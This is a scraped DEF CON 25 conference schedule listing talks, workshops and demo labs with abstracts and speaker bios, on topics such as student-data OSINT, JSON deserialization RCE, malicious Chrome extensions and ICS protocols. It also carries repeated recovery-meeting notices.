Wireless - Florentine BR I & II - Promenade Level - Friday - 17:00-17:55


Failsafe: Yet Another SimplySafe Attack Vector

No description available


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 14:00-14:59


Title:
FERPA - Only Your Grades Are Safe; OSINT in Higher Education

1400 Saturday
Leah Figueroa/ Princess Leah
@Sweet_Grrl
FERPA - Only Your Grades Are Safe; OSINT in Higher Education

Institutions of higher education are supposed to be somewhere that students go, earn a degree, and leave, all while their data is safe. Or is it? In this talk, I discuss the gaping security holes left by FERPA (Family Educational Rights and Privacy Act (20 U.S.C. 1232g; 34 CFR Part 99)) with regard to student data. Almost all student data, with the exception of grades and select demographics picked by each institution, is commonly listed as directory information that is available to anyone who asks. Add to this that most institutions of higher education commonly practice automatic opt-in for Directory Information and require students to specifically request that their information be withheld. This leads to an OSINT opportunity ripe for abuse. However, that is not the only issue. Due to a loophole in the way medical records are handled at institutions of higher education, these records can lose almost all protections and become classified as Directory Information. I show examples of how easily this information can be retrieved from several institutions and what sort of information is available from many institutions. At the conclusion of the talk, I illustrate the various ways this information can potentially be used against a victim or in the construction of a false identity.

Return to Index      -     

 

RCV - Palermo room, Promenade level - Sunday - 10:35-11:25


FERPA: Only Your Grades Are Safe; OSINT In Higher Education

Abstract

Institutions of higher education are supposed to be somewhere that students go, earn a degree, and leave, all while their data is safe. Or is it? In this talk, I discuss the gaping security holes left by FERPA (Family Educational Rights and Privacy Act (20 U.S.C. § 1232g; 34 CFR Part 99)) with regard to student data. Almost all student data, with the exception of grades and select demographics picked by each institution, is commonly listed as directory information that is available to anyone who asks. Add to this that most institutions of higher education commonly practice automatic “opt-in” for Directory Information and require students to specifically request that their information be withheld. This leads to an OSINT opportunity ripe for abuse.

However, that is not the only issue. Due to a loophole in the way medical records are handled at institutions of higher education, these records can lose almost all protections and become classified as Directory Information.

I show examples of how easily this information can be retrieved from several institutions and what sort of information is available from many institutions. At the conclusion of the talk, I illustrate the various ways this information can potentially be used against a victim or in the construction of a false identity.

Speaker Profile

Leah Figueroa (@Sweet_Grrl) is a 13-year veteran of the data analytics field and works as a data analyst in higher education. She holds a Master’s in Education, an ABD in research psychology, and has taught kindergarten.

A data aficionado, Leah focuses on research on improving student outcomes at the higher education level, including focusing on both minority student issues as well as issues pertaining to students who come from a background of poverty. While not at work, Leah is interested in increasing data security in the higher education sphere as well as improving blue teams by helping bring data analytics into the team. Leah also enjoys being a fiber artist (knitter) and loves cats, InfoSec, picking locks, cooking, and reading.


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 10:00-10:59


Title:
Financial Crime 2.0

1000 Friday
Marcelo Mansur
@thatinfosecrec
Financial Crime 2.0

After the feedback from last year's talk I'm bringing this back to go into more detail about some of the finer points, cover some new cases of who's been caught and materials such as shopping lists of financial secrets. This will delve deeper into the murky coalition between cybercriminals and traders and, of course, I'll be telling you all I told you so!

Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 16:10-16:59


Fooling the Hound: Deceiving Domain Admin Hunters

Tom Sela, Head of Security Research at illusive networks

The conflict between cyber attackers and defenders is too often in favor of attackers. Recent results of graph theory research incorporated into red-team tools such as BloodHound shift the balance even more dramatically towards attackers. Any regular domain user can map an entire network and extract the precise path of lateral movements needed to obtain domain admin credentials or a foothold at any other high-value asset. In this talk, we present a new practical defensive approach: deceive the attackers. Since the time of Sun Tzu, deceptions have been used on the battlefield to win wars. In recent years, the ancient military tactic of deception has been adopted by the cyber-security community in the form of HoneyTokens. Cyber deceptions, such as fictitious high-privilege credentials, are used as bait to lure the attackers into a trap where they can be detected. To shift the odds back in favor of the defenders, the same BloodHound graphs that are generated by attackers should be used by defenders to determine where and how to place bait with maximum effectiveness. In this way, we ensure that any shortest path to a high-value asset will include at least one deceptive node or edge.

Tom Sela (Twitter: @4x6hw) is Head of Security Research at illusive networks, specializing in Reverse Engineering, Malware Research, and OS internals. Prior to joining illusive, Tom led the Malware Research team at Trusteer (acquired by IBM). Tom majored in Computer Science at Ben-Gurion University and studied at the Israeli Naval Academy, University of Haifa.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 12:10-12:59


Fortune 100 InfoSec on a State Government Budget

Eric Capuano, SOC Manager at Texas Department of Public Safety

A common misconception is that it takes spending millions to be good at security. Not only is this untrue, but I will share ways that you can increase security posture while actually reducing spending. This talk outlines many of the tricks and mindsets to doing security well without breaking the bank. This is not the typical “Problem, problem, problem....” talk.... This is a solution-based talk that goes back to many of the basic challenges facing SOC teams everywhere.

Eric Capuano (Twitter: @eric_capuano) is an Information Security professional serving state and federal government as well as SMBs, start-ups and non-profits. He is also a member of the Packet Hacking Village team at DEF CON.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 6 - Saturday - 10:30-14:30


Free and Easy DFIR Triage for Everyone: From Collection to Analysis

Saturday, 10:30 to 14:30 in Octavius 6

Alan Orlikoski

Dan M.

The hardest part of Digital Forensics and Incident Response (DFIR) is getting a meaningful look at "the goods". The digital artifact collection and parsing process usually requires a lot of time, money, or both. Wouldn't it be nice if there was a way to do this with a straightforward tool chain that was 100% free*, easy to set up, and didn't require a PhD in coding, GitHub command mastery, and endless hours of "Where the @%^@$ did that dependency come from and how do I get it?" This course is a tutorial for the CyLR, CDQR, Forensics Virtual Machine (CCF-VM), where attendees will learn how to establish a working collection, data processing, and analysis solution for any size environment.

Attendees will setup and learn to use their own CCF-VM that includes: secure data collection from Windows and Linux Hosts, automated processing, and meaningful presentation of the data. After the data has been collected and processed, attendees will learn how to optimize dashboards for common kill chain analysis and Data Stacking.

*Your time must be worthless and your hardware free flowing

Prerequisites: Functional knowledge of Digital Forensics and Incident Response (DFIR) fundamentals including: the IR life cycle, artifact collection and preservation, timeline analysis, and modern threat kill chains. Attendees should have a working knowledge of network fundamentals, Windows and Linux configurations, and virtualization. Familiarity with VMware / VirtualBox, Python, Elasticsearch, Kibana, and Plaso is ideal but not required.

Materials: A laptop capable of running either VirtualBox or VMware software with 100 GB free HD space and 8 GB RAM and an i5-equivalent processor (minimum), or 16 GB RAM and an i7-equivalent processor (preferred). All software is available from GitHub, while virtual machines and data files will be available at the course. A 32 GB USB 3.0 flash drive with the software, virtual machines, and data files will be made available to attendees at a cost of $20 (materials fee).

Max students: 30 | Registration: https://dc25_orlikoski.eventbrite.com (Sold out!)

Alan Orlikoski
Alan has over 17 years of experience in both private and public sectors of the IT industry, with over 11 years of experience leading cyber security related projects. He has an extensive forensics background, has written multiple open source forensic tools, has been profiled on the SQRRL Threat Hunter Blog, and has presented at multiple security conferences. Alan has been a leader in some of the largest incident response and security operations center development programs in the history of multiple Fortune 100 companies. He also teaches Historical European Martial Arts (yup, he knows how to fight with a sword, poleaxe, spear...you get the picture).

Dan M.
Dan is a broad-spectrum technology professional with 18 years of experience, 13 in direct performance of Digital Forensics and Incident Response (DFIR). Dan has served as a contributor, Technical Lead, and Practice Lead for a Fortune 10 Incident Response service. In this role, Dan provided oversight of the goals and delivery of the service as well as functioning as a senior incident handler and critical incident lead. Dan's investigation experience includes support for basic forensic analysis up through responses to complete enterprise breach scenarios. During this work Dan contributed to the patent development of enterprise threat intelligence sharing technologies. Dan has also been a presenter at events such as FIRST, Evanta, HTCIA, APWG, IEEE and many customer engagements.


Return to Index      -     

 

DEFCON - Track 4 - Sunday - 14:00-14:45


Friday the 13th: JSON attacks!

Sunday at 14:00 in Track 4

45 minutes | Demo, Exploit

Alvaro Muñoz Principal Security Researcher, Hewlett Packard Enterprise

Oleksandr Mirosh Senior Security QA Engineer, Hewlett Packard Enterprise

2016 was the year of the Java deserialization apocalypse. Although Java deserialization attacks were known for years, the publication of the Apache Commons Collections Remote Code Execution (RCE from now on) gadget finally brought this forgotten vulnerability to the spotlight and motivated the community to start finding and fixing these issues.

One of the most suggested solutions for avoiding Java deserialization issues was to move away from Java Deserialization altogether and use safer formats such as JSON. In this talk, we will analyze the most popular JSON parsers in both .NET and Java for potential RCE vectors.

We will demonstrate that RCE is also possible in these libraries and present details about the ones that are vulnerable to RCE by default. We will also discuss common configurations that make other libraries vulnerable.

In addition to focusing on the JSON format, we will generalize the attack techniques to other serialization formats. In particular, we will pay close attention to several serialization formats in .NET. These formats have also been known to be vulnerable since 2012, but the lack of known RCE gadgets led some software vendors to not take this issue seriously. We hope this talk will change this. With the intention of bringing due attention to this vulnerability class in .NET, we will review the known vulnerable formats, present other formats which we found to be vulnerable as well, and conclude by presenting several gadgets from system libraries that may be used to achieve RCE in a stable way: no memory corruption — just simple process invocation.

Finally, we will provide recommendations on how to determine if your code is vulnerable, provide remediation advice, and discuss alternative approaches.

Alvaro Muñoz
Alvaro Muñoz (@pwntester) works as Principal Software Security Researcher with HPE Security Fortify, Software Security Research (SSR). His research focuses on different programming languages and web application frameworks, searching for vulnerabilities or unsafe uses of APIs. Before joining the research team, he worked as an Application Security Consultant helping enterprises to deploy their application security programs. Muñoz has presented at many security conferences including DEF CON, RSA, AppSecEU, Protect, DISCCON, etc., holds several infosec certifications, including OSCP, GWAPT and CISSP, and is a proud member of the int3pids CTF team. He blogs at http://www.pwntester.com.

@pwntester

Oleksandr Mirosh
Oleksandr Mirosh has over 9 years of computer security experience, including vulnerability research, penetration testing, reverse engineering, fuzzing, developing exploits and consulting. He is working for the HPE Software Security Research team investigating and analyzing new threats, vulnerabilities, security weaknesses, and new techniques for exploiting security issues, and developing vulnerability detection, protection and remediation rules. In the past, he has performed a wide variety of security assessments, including design and code reviews, threat modelling, testing and fuzzing in order to identify and remove any existing or potentially emerging security defects in the software of various customers.


Return to Index      -     

 

BillW - Office 4A on Promenade Level - Thursday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Thursday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Friday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Friday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Saturday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Saturday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Sunday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Sunday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if you're trying to keep the horizon level in your windscreen. If you're a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. We'll be there.
(See the info booth next to Office 4 on the map if you're having trouble finding Office 4A.)
Return to Index      -     

 

DEFCON - Track 2 - Saturday - 16:00-16:45


From "One Country - One Floppy" to "Startup Nation" - the story of the early days of the Israeli hacking community, and the journey towards today's vibrant startup scene

Saturday at 16:00 in Track 2

45 minutes | Hacker History

Inbar Raz Principal Researcher, PerimeterX Inc.

Eden Shochat Equal Partner, Aleph

The late 80's and early 90's played a pivotal role in the forming of the Israeli tech scene as we know it today, producing companies like Checkpoint, Waze, Wix, Mobileye, Viber and billions of dollars in fundraising and exits. The people who would later build that industry were anywhere from elementary school to high school, and their paths included some of the best hacking stories of the time (certainly in the eyes of the locals). The combination of an extremely expensive Internet and international dial system, non-existent legal enforcement and a lagging national phone company could not prevent dozens of hungry-for-knowledge kids from teaching themselves the dark arts of reversing, hacking, cracking, phreaking and even carding. The world looked completely different back then and we have some great stories for you. We will cover the evolution of the many-years-later-to-be-named-Cyber community, including personal stories from nearly all categories. Come listen to how the Israeli Cyber "empire" was born, 25 years ago, from the perspectives of 2:401/100 and 2:401/100.1.

Inbar Raz
Inbar has been reverse engineering for nearly as long as he has been living. It started with a screwdriver, pliers, wire cutters, and his grandfather's ECG machine, and gradually transitioned into less destructive research. In 1984, aged 9, he started programming on his Dragon 64. At 13 he got his first PC - Amstrad PC1512 - and within a year was already into reverse engineering. It wasn't long before he discovered how to access the X.25 network, Bitnet and Fidonet, and through high-school he was a key figure in the Israeli BBS scene.

Inbar spent most of his career in the Internet and Data Security field, and the only reason he's not in jail right now is because he chose the right side of the law at an early age. In fact, nowadays he commonly lectures about Ethical Hacking and Coordinated Vulnerability Disclosure.

Inbar specializes in an outside-the-box approach to analyzing security and finding vulnerabilities, and is currently the Principal Researcher at PerimeterX, researching and educating the public on Automated Attacks on Websites.

@inbarraz
https://www.linkedin.com/in/inbar-raz-90a7913/

Eden Shochat
Eden Shochat builds stuff, most recently Aleph, +$330MM venture capital fund; The Junction, voted #1 startup program in Israel; face.com, a massive face recognition API acquired by Facebook; Aternity, the leading user-centric enterprise IT platform, acquired by Riverbed; and GeekCon, Europe's biggest makers conference. Eden grew up in Nigeria, where he was bored into assembly programming for the Z80 chip, graduated into the demo and cracking scenes while being thrown out of high-school but ended up being a (somewhat) productive member of society.

@eden
https://www.linkedin.com/in/edens/


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 11:00-11:45


From Box to Backdoor: Using Old School Tools and Techniques to Discover Backdoors in Modern Devices

Thursday at 11:00 in 101 Track

45 minutes

Patrick DeSantis Senior Security Research Engineer, Cisco Talos

Stringing together the exploitation of several seemingly uninteresting vulnerabilities can be a fun challenge for security researchers, penetration testers, and malicious attackers. This talk follows some of the paths and thought processes that one researcher followed while evaluating the security of several new "out of the box" Industrial Control System (ICS) and Internet of Things (IoT) devices, using a variety of well known exploitation and analysis techniques, and eventually finding undocumented, root-level, and sometimes un-removable, backdoor accounts.

Patrick DeSantis
Patrick DeSantis is a security researcher with Cisco Talos and focuses his efforts on discovery and exploitation of vulnerabilities in technologies that have an impact on the physical world, such as Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA), Internet of Things (IoT), and anything else that looks like it's asking to be hacked. Patrick's background includes work in both the public and private sectors, as well as a pile of information security certifications and a few college degrees.

@pat_r10t


Return to Index      -     

 

IOT - Main Contest Area - Saturday - 10:00-10:50



Return to Index      -     

 

IOT - Main Contest Area - Sunday - 11:00-11:50



Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 13:00-13:59


Title:
From OPSUCK to OPSEXY: An OPSEC Primer

1300 Friday
H0m3l3ss, Steve Pordon, and minion
@H0m3l3ssHacker @Legion303
From OPSUCK to OPSEXY: An OPSEC Primer

Return to Index      -     

 

ICS - Calibria - Friday - 11:00-11:30


Title: Fun with Modbus function code 90.

Forget 0-days, long live "forever days"! In this talk, we'll take a look at how Schneider PLCs rely on an undocumented Modbus function code for administrative actions (start/stop, download and upload ladder logic, ...). We'll also demo the dedicated Metasploit program, and discuss the security level of newer Schneider PLCs. We'll conclude with defensive measures you can take to prevent attacks using this protocol.


Bio: Arnaud Soullié

Arnaud Soullié (@arnaudsoullie) is a manager at Wavestone, where he has been performing security audits, pentests and research for 7+ years. He has a specific interest in Active Directory security as well as ICS, two subjects that tend to collide nowadays. He teaches ICS security and pentest workshops at security conferences (BlackHat Europe 2014, BSides Las Vegas 2015, Brucon 2015, DEFCON) as well as full trainings (Hack In Paris 2015).



Return to Index      -     

 

Demolabs - Table 1 - Saturday - 10:00-11:50


Fuzzapi

Abhijeth Dugginapeddi

Lalith Rallabhandi

Srinivas Rao

Saturday from 1000-1150 at Table One

Audience: AppSec, Web/Mobile Developers, DevOps

Fuzzapi is a REST API pen testing tool that automatically does a bunch of checks for vulnerabilities on your APIs. Rather than a tool that only identifies vulnerabilities in web services, we have built a platform that enables everyone to test and understand a large range of API vulnerabilities that exist in both web and mobile applications. After seeing the benefits of automating REST API pen testing using a basic Fuzzapi tool, the authors have decided to come up with a better version which can automatically look for vulnerabilities in APIs from the time they are written. REST APIs are often one of the main sources of vulnerabilities in most web/mobile applications. Developers quite commonly make mistakes in defining permissions on various cross-platform APIs. This gives attackers a chance to abuse these APIs. Fuzzapi is a tool written in Ruby on Rails which helps to quickly identify such commonly found vulnerabilities in APIs, which in turn helps developers fix them earlier in the SDLC. The first released version of the tool only has limited functionality; however, the authors are currently working on releasing the next version, which will completely automate the process and save a lot of time and resources.

https://www.youtube.com/watch?v=43G_nSTdxLk&t=321s

Abhijeth Dugginapeddi
Abhijeth D (@abhijeth) is a Security Consultant working for a bank in Australia. He previously worked with Adobe Systems, TCS and Sourcenxt. He is a security enthusiast in the fields of penetration testing and application/mobile/infrastructure security, and believes in the need for more security awareness and free responsible disclosures. He got lucky in finding a few vulnerabilities with Google, Yahoo, Facebook, Microsoft, eBay, PayPal, etc., and is one of the top 5 researchers on Synack, a bug bounty platform. He is also interested in social media marketing, digital marketing and web design.

Lalith Rallabhandi
Lalith Rallabhandi (@lalithr95) currently works as a Security Intern at Shopify. He has previously worked with Hackerrank, Zomato and Google Summer of Code. He likes to code, breaks stuff (mostly web applications) and is a Ruby on Rails enthusiast. He has found bugs with Google, Microsoft, Facebook, Badoo, Twitter etc.

Srinivas Rao



DEFCON - Track 1 - Sunday - 13:00-13:45


Game of Chromes: Owning the Web with Zombie Chrome Extensions

Sunday at 13:00 in 101 Track

45 minutes | Demo

Tomer Cohen R&D Security Team Leader, Wix.com

On April 16 2016, an army of bots stormed upon Wix servers, creating new accounts and publishing shady websites en masse. The attack was carried out by a malicious Chrome extension, installed on tens of thousands of devices, sending HTTP requests simultaneously. This "Extension Bot" used the Wix websites platform and Facebook messaging service to distribute itself among users. Two months later, the same attackers struck again. This time they used infectious notifications, popping up on Facebook and leading to a malicious Windows-runnable JSE file. Upon clicking, the file ran and installed a Chrome extension on the victim's browser. Then the extension used Facebook messaging once again to pass itself on to more victims.

Analyzing these attacks, we were amazed by the highly elusive nature of these bots, especially when it comes to bypassing web-based bot-detection systems. This shouldn't be surprising, since legit browser extensions are supposed to send Facebook messages, create Wix websites, or in fact perform any action on behalf of the user.

On the other hand, smuggling a malicious extension into the Google Web Store and distributing it among victims efficiently, like these attackers did, is, let's say, not a stroll in the park. But don't worry, there are other options.

Recently, several popular Chrome extensions were found to be vulnerable to XSS. Yep, the same old XSS every rookie finds in so many web applications. So browser extensions suffer from it too, and sadly, in their case it can be much deadlier than in regular websites. One noticeable example is the Adobe Acrobat Chrome extension, which was silently installed on January 10 by Adobe, on an insane number of 30 million devices. A DOM-based XSS vulnerability in the extension (found by Google Project Zero) allowed an attacker to craft content that would run JavaScript as the extension.

In this talk I will show how such a flaw leads to full and permanent control over the victim's browser, turning the extension into a zombie. Additionally, shedding more light on the 2016 attacks on Wix and Facebook described in the beginning, I will demonstrate how an attacker can use similar techniques to distribute her malicious payload efficiently onto new victims, through popular social platforms, creating the web's most powerful botnet ever.

Tomer Cohen
Tomer Cohen leads the team at Wix.com responsible for all R&D and production systems security. Prior to that, Tomer worked as an application security expert in several firms. Tomer was also one of the founders of the "Magshimim" cyber training program, which teaches development and cyber security to high-school students in the periphery of Israel.



DEFCON - Track 4 - Saturday - 16:00-16:45


Game of Drones: Putting the Emerging "Drone Defense" Market to the Test

Saturday at 16:00 in Track 4

45 minutes | Art of Defense, Demo, Tool

Francis Brown Partner, Bishop Fox

David Latimer Security Analyst, Bishop Fox

When you learned that military and law enforcement agencies had trained screaming eagles to pluck drones from the sky, did you too find yourself asking: "I wonder if I could throw these eagles off my tail, maybe by deploying delicious bacon countermeasures?" Well, you'd be wise to question just how effective these emerging, first generation "drone defense" solutions really are, and which amount to little more than "snake oil".

There is no such thing as "best practices" when it comes to defending against "rogue drones", period. Over the past 2 years, new defensive products that detect and respond to "rogue drones" have been crawling out of the woodwork. The vast majority are immature, unproven solutions that require a proper vetting.

We've taken a MythBusters-style approach to testing the effectiveness of a variety of drone defense solutions, pitting them against our DangerDrone. Videos demonstrating the results should be almost as fun for you to watch as they were for us to produce. Expect to witness epic aerial battles against an assortment of drone defense types, including:

• trained eagles and falcons that hunt "rogue drones"
• fighter drones that hunt and shoot nets
• drones with large nets that swoop in and snatch up 'rogue drones'
• surface-to-air projectile weapons, including bazooka-like cannons that launch nets, and shotgun shells containing nets
• signal jamming and hijacking devices that attack drone command and control interfaces
• even frickin' laser beams and Patriot missiles!

We'll also be releasing DangerDrone v2.0, an upgraded version of our free Raspberry Pi-based pentesting quadcopter (basically a ~$500 hacker's laptop that can also fly). We'll be giving away a fully functional DangerDrone v2.0 to one lucky audience member!

So come see what's guaranteed to be the most entertaining talk this year and find out which of these dogs can hunt!

Francis Brown
Francis Brown, CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Stach & Liu, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients.

Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications.

Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.

David Latimer
David Latimer is a Security Analyst at Bishop Fox, a security consulting firm providing IT security services to the Fortune 500, global financial institutions, and high-tech startups. In this role, he focuses on network and web application penetration testing.

He won a state Cisco Networking Skills competition for Arizona in 2013. He has acted as a network engineer for one of Phoenix's largest datacenters, PhoenixNAP, where he architected large-scale virtualization clusters and assisted with backup disaster recovery services.



DEFCON - Track 4 - Sunday - 12:00-12:45


Genetic Diseases to Guide Digital Hacks of the Human Genome: How the Cancer Moonshot Program will Enable Almost Anyone to Crash the Operating System that Runs You or to End Civilization...

Sunday at 12:00 in Track 4

45 minutes

John Sotos Chief Medical Officer, Intel Corporation

The human genome is, fundamentally, a complex open-source digital operating system (and set of application programs) built on the digital molecules DNA and RNA.

The genome has thousands of publicly documented, unpatchable security vulnerabilities, previously called "genetic diseases." Because emerging DNA/RNA technologies, including CRISPR-Cas9 and especially those arising from the Cancer Moonshot program, will create straightforward methods to digitally reprogram the genome in free-living humans, malicious exploitation of genomic vulnerabilities will soon be possible on a wide scale.

This presentation shows the breathtaking potential for such hacks, most notably the exquisite targeting precision that the genome supports — in effect, population, and time — spanning annoyance to organized crime to civilization-ending pandemics far worse than Ebola.

Because humans are poor at responding to less-than-immediate threats, and because there is no marketplace demand for defensive technologies on the DNA/RNA platform, the hacker community has an important role to play in devising thought-experiments to convince policy makers to initiate defensive works, before offensive hacks can be deployed in the wild. Hackers can literally save the world... from ourselves.

John Sotos
John Sotos is Chief Medical Officer at Intel Corporation. He has been programming computers continuously since 1970, excepting four years of medical school at Johns Hopkins, where he also trained as a transplantation cardiologist. His professional interests include hacking the medical diagnostic process, first with a book on edge cases, called "Zebra Cards: An Aid to Obscure Diagnosis," followed by six years as a medical technical consultant on the popular television series "House, MD." His master's degree in artificial intelligence is from Stanford, and he is a co-founder of Expertscape.com. He is a long-time air rescue flight surgeon for the National Guard; however, the opinions presented here are his own, and do not necessarily represent those of the Department of Defense or Intel.

www.intel.com
www.sotos.com



DEFCON - Track 3 - Saturday - 10:00-10:30


Get-$pwnd: Attacking Battle-Hardened Windows Server

Saturday at 10:00 in Track 3

20 minutes | Demo, Tool

Lee Holmes Principal Security Architect, Microsoft

Windows Server has introduced major advances in remote management hardening in recent years through PowerShell Just Enough Administration ("JEA"). When set up correctly, hardened JEA endpoints can provide a formidable barrier for attackers: whitelisted commands, with no administrative access to the underlying operating system.

In this presentation, watch as we show how to systematically destroy these hardened endpoints by exploiting insecure coding practices and administrative complexity.

Lee Holmes
Lee Holmes is the lead security architect of Microsoft's Azure Management group, covering Azure Stack, System Center, and Operations Management Suite. He is the author of the Windows PowerShell Cookbook, and an original member of the PowerShell development team.



DEFCON - Track 4 - Sunday - 10:20-10:40


Ghost in the Droid: Possessing Android Applications with ParaSpectre

Sunday at 10:20 in Track 4

20 minutes | Demo, Tool

chaosdata Senior Security Consultant, NCC Group

Modern Android applications are large and complex, and can be a pain to analyze even without obfuscation - static analysis can only get one so far, the debugger sucks, Frida doesn't give you enough access to the Java environment, and editing smali or writing Xposed hooks can be time consuming and error prone. There has to be a better way!

What if we could inject a command line REPL into an app to drive functionality? And what if we could also make writing function hooks fast and easy?

In this talk, I will introduce ParaSpectre, a platform for dynamic analysis of Android applications that injects JRuby into Android applications. It bundles a hook configuration web API, a web application interface to configure and edit hooks, and a connect-back JRuby REPL to aid application exploration from the inside-out. It supports various selectors to match classes and methods, can be reconfigured on-the-fly without requiring a device reboot, and takes the pain out of writing method hooks for Android apps.

ParaSpectre is for developers and security researchers alike. While not itself a debugger, it provides a level of access into a running application that a debugger generally won't.

chaosdata
chaosdata (aka "Jeff") is a security consultant by day, and sometimes by night. He hacks on embedded systems, mobile apps and devices, web apps, and complicated things that don't have names. He also likes exotic candies.

@chaosdatumz



Demolabs - Table 2 - Saturday - 10:00-11:50


GibberSense

Ajit Hatti

Saturday from 1000-1150 at Table Two

Audience: Cryptologists, cryptanalysts, forensic investigators, developers and testers.

Found a gibberish string or unknown file on your forensics and investigation assignment and don't know what it is? Throw it to GibberSense; it might try to make some sense out of it.

Not sure if a file is encrypted, encoded or obfuscated using substitution ciphers? GibberSense can give you a statistical analysis of the contents, gives you direction for further investigation, and also gives you an excellent visualization.

Being an extensible framework, GibberSense provides tools for simple XOR encryption and frequency analysis, which give basic cryptanalysis capabilities.

An open source initiative, GibberSense is an experimental tool for improving investigations.

https://github.com/smxlabs/gibbersense

Ajit Hatti
Ajit Hatti has been contributing to the secure usage of cryptography for the past 5 years and is currently focusing on the security issues of blockchain related technologies. He is the author of the LAMMA & GibberSense tools, which help in securing crypto and PKI implementations.

Ajit is the founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded the Null Open Security Community and has worked with Symantec, Emerson, ZScaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at BlackHat, DEFCON and the Crypto-n-Privacy Village, and organizes Nullcon in India. He loves to run and volunteer at BSides LV and organizes The World Run by Hackers.



PHV - Milano VIII - Promenade Level - Sunday - 12:10-12:59


Go Beyond Tabletop Scenarios by Building an Incident Response Simulation Platform

Eric Capuano, SOC Manager at Texas Department of Public Safety

How prepared is your incident response team for a worst case scenario? Waiting for a crisis to happen before training for a crisis is a losing approach. For things that must become muscle memory, instinctive, you must simulate the event and go through the motions. This talk is a deep-dive technical discussion on how you can build your own DFIR simulation. Best part -- almost all of this can be accomplished with open source tools and inexpensive equipment, but I'll also share tips and tricks on getting free commercial hardware and software for use in your new simulation environment!

Eric Capuano (Twitter: @eric_capuano) is an Information Security professional serving state and federal government as well as SMBs, start-ups and non-profits. He is also a member of the Packet Hacking Village team at DEF CON.



Wireless - Florentine BR I & II - Promenade Level - Saturday - 17:00-17:55


Tim Kuester

Bio

Tim K is an electronics engineer living in Virginia Beach. He enjoys designing embedded systems and working with radios. Previously, he has taught workshops on Software Defined Radio at conferences like Kiwicon and Cyberspectrum. His favorite programming language is solder.

@bjt2n3904

Bio

Woody: Noob at heart. It's rumored he can lift heavy things but probably can't spell them. Until a few years ago he thought Linux was Charlie Brown's best friend.

@tb69rr

